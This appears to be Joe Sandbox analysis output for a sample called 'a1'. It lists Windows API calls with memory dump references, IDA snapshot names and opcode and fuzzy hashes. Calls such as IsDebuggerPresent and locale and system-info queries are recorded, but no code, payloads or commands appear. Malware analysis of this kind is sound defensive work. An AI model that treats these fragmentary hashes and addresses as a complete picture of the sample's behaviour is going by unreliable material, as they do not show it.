                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,001C5514,?), ref: 00348EDE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1475849761-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4d012e4498d5dfeabdad14534910c26636f291a1f51653619b0fc142ecfaf800
                                                                                                                                                                                                                                                                          • Instruction ID: 70c63587e124c7b12e873e9596c7b0a96eafda20fbe153e27646ecf0421d6dfc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d012e4498d5dfeabdad14534910c26636f291a1f51653619b0fc142ecfaf800
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AF04F72A10611DBDB629F68AC08F2A76ECFF88716F150429E949D7250DF70F8428B60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,2000000B,6A58718C,00000002,00000000,?,?,?,6A58718C,?,00000000), ref: 6A586F07
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,20001004,6A58718C,00000002,00000000,?,?,?,6A58718C,?,00000000), ref: 6A586F30
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,6A58718C,?,00000000), ref: 6A586F45
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                          • Opcode ID: 589690616e1b7a454ac3f1227b609fa7d259a999a7488deb5c528359ad0cc48d
                                                                                                                                                                                                                                                                          • Instruction ID: b9f0b82f450ca58ef3a85a6c0b82b5cd73a7898d1fb14f758ab3e3f12b1cfe24
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 589690616e1b7a454ac3f1227b609fa7d259a999a7488deb5c528359ad0cc48d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E721D3A2766321ABE721CF18C901A8773B7AF40B54B438864FA05E7904EF32DE40C750
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 6A57B8D2: GetLastError.KERNEL32(?,00000008,6A583C9D), ref: 6A57B8D6
                                                                                                                                                                                                                                                                            • Part of subcall function 6A57B8D2: SetLastError.KERNEL32(00000000,00000001,FFFFFFFF,000000FF), ref: 6A57B978
                                                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6A58714F
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 6A587198
                                                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 6A5871A7
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6A5871EF
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6A58720E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 415426439-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8cdced20316f2e019f8f4615ca67155751ee97ee23c0f351386bff8127aac9ff
                                                                                                                                                                                                                                                                          • Instruction ID: a2cd2651066380b4c8bd99ad9b51fef80a03ce358485e17dc4babe8c1b2f52a4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cdced20316f2e019f8f4615ca67155751ee97ee23c0f351386bff8127aac9ff
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA5161B1B00225AFEF11DFA5CC84AAE77B9BF45700F124469E915EB590EF70DA04CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                          • Opcode ID: c383ffd43711e4333b482333af4600e5756eb8a4c5c73a880ddb4b98ecdd5d33
                                                                                                                                                                                                                                                                          • Instruction ID: 741a00ed8e694b26bb321c5b3f79a780f1a3aa37b84e8561b6f106e5e29c257d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c383ffd43711e4333b482333af4600e5756eb8a4c5c73a880ddb4b98ecdd5d33
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5B135739042559FDB25CF68C890BEEBBE5EF95314F16816AE804BB241DB34D901CFA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                          • Opcode ID: b986c5e0cb5b45c21f4c06af125ebc57dadd374eea57dc641108e9d4ce7859bb
                                                                                                                                                                                                                                                                          • Instruction ID: 5cbdf920640c096acb22c89a3b99ea1c41d8f1abdbd8cbe9294ade796b995eca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b986c5e0cb5b45c21f4c06af125ebc57dadd374eea57dc641108e9d4ce7859bb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62B12532E052859FDB16CF68C891BEEBBF5EF55310F19C26AE844AB245D3749D01CBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5603a2d2d1ee648717c56cc850ee180c203fdb4dc01c0668a39c0ad0ce8804d7
                                                                                                                                                                                                                                                                          • Instruction ID: cc2555f154aa3ccbbcbf4e120c815df49d2d6a911a240a7aa2161357be256aef
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5603a2d2d1ee648717c56cc850ee180c203fdb4dc01c0668a39c0ad0ce8804d7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F81BD70911259DFDB20CF68CC49B99F7B8EF45310F2482D9E819AB292DB309E84CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,?,00000017,DF534560,?,?,?,?,?,?,00000000,Function_001CC38D,000000FF), ref: 0024E859
                                                                                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,Function_001CC38D,000000FF), ref: 0024E868
                                                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,?,?,?,00000000,Function_001CC38D,000000FF), ref: 0024E873
                                                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,Function_001CC38D,000000FF), ref: 0024E884
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                                                                                          • Opcode ID: d44391bdd6a8a2562600d19dbac6ddefb9bab928c0c82e7a8a9e0d428de7764c
                                                                                                                                                                                                                                                                          • Instruction ID: 506f7ad13d80c0fb9d9b5e9f948539924e134783bda9886574e5e9ff86f2a5b4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d44391bdd6a8a2562600d19dbac6ddefb9bab928c0c82e7a8a9e0d428de7764c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6131C271D25715ABEB259F74DC01BABB7B8FB54710F044229EC15D7290EB30A914C7A1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6A56D9A1
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6A56DA6D
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6A56DA8D
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6A56DA97
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                                          • Opcode ID: 27923f79bb6c5fb146f07d3f445fc6dd8766b1b75b68eac0337d1700407a250c
                                                                                                                                                                                                                                                                          • Instruction ID: c6fe3d3ecabc4201982100913b956feb24b5812905af25cc01a757a9151ca0f5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27923f79bb6c5fb146f07d3f445fc6dd8766b1b75b68eac0337d1700407a250c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46313676E052189BDF11DFA0C989BCDBBF8BF09304F1041AAE50DAB250EB709A85CF45
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00000002,003D744C,00000000), ref: 002DBBF1
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00000002,000000FF,-00000001,00000078,-00000001), ref: 002DBC2D
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9AE0: RtlAllocateHeap.NTDLL(?,00000000,?,DF534560,00000000,00371390,000000FF,?,?,0044E7AC,?,001BCB99,80004005,DF534560,-00000010,?), ref: 001B9B2A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HeapInfoInit_thread_footerLocale$AllocateProcess
                                                                                                                                                                                                                                                                          • String ID: %d-%s
                                                                                                                                                                                                                                                                          • API String ID: 2080693894-1781338863
                                                                                                                                                                                                                                                                          • Opcode ID: b054362ce91815720f72ec66a22aa8e133c058126ba1c84bde07dd53dc676c86
                                                                                                                                                                                                                                                                          • Instruction ID: 62595b03a8bc3acda6c878e201ffd8296092a2e0aaf55277272387e36b8b6c51
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b054362ce91815720f72ec66a22aa8e133c058126ba1c84bde07dd53dc676c86
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0619DB0900209DFD711DF68C919B9EBBF4FF05318F20869DE5159B392DB769A05CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,00000000,?), ref: 002E23EC
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 002E2537
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9AE0: RtlAllocateHeap.NTDLL(?,00000000,?,DF534560,00000000,00371390,000000FF,?,?,0044E7AC,?,001BCB99,80004005,DF534560,-00000010,?), ref: 001B9B2A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Find$AllocateCloseFileFirstHeap
                                                                                                                                                                                                                                                                          • String ID: %d.%d.%d.%d
                                                                                                                                                                                                                                                                          • API String ID: 1673784098-3491811756
                                                                                                                                                                                                                                                                          • Opcode ID: 28ab757a272c779e6b6b0b2a8af579de9f9ee11807398d1d90b05fbf5902c42f
                                                                                                                                                                                                                                                                          • Instruction ID: e8fbf12c63649d6451ed94955de06e67136de66386bd9e5b5ffed7c39129b50b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28ab757a272c779e6b6b0b2a8af579de9f9ee11807398d1d90b05fbf5902c42f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C619D70905259DFDF24DF28CD48B9DBBB8EF04314F108299E419AB291DB359A88CF80
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(80000000,00346597,0000001C,0034678C,00000000,?,?,?,?,?,?,?,00346597,00000004,00459914,0034681C), ref: 00346663
                                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00346597,00000004,00459914,0034681C), ref: 0034667E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoQuerySystemVirtual
                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                          • API String ID: 401686933-2746444292
                                                                                                                                                                                                                                                                          • Opcode ID: 6b23b18d5b67c6a6ec2637ac3a3ef9493391859d15772d46f56298cc2dd8cbc9
                                                                                                                                                                                                                                                                          • Instruction ID: 857c51d706eceac2c5433c4a4f3476e9f39b9938b2c972984d0e254d7af7c915
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b23b18d5b67c6a6ec2637ac3a3ef9493391859d15772d46f56298cc2dd8cbc9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E01F732A00109ABDB14DE29CC05BDE7BEDAFC5324F0EC225ED59DB244DA38E9018680
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,DF534560,?,00000000), ref: 002B93BB
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 002B93C5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                          • Opcode ID: 72dcd46345dfee47849670d2b4ee8703b18bf31662902495820827c615e4c7f6
                                                                                                                                                                                                                                                                          • Instruction ID: 613e87c38bab2fb0fb1fcacec54bd0fb3ff06c5ad04c3960f0e7b8c5f2b4ff54
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72dcd46345dfee47849670d2b4ee8703b18bf31662902495820827c615e4c7f6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E731DF71A10219AFEB10DFA9DC45BEEB7F8EB04B54F20026AF614E73C1DBB599008790
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
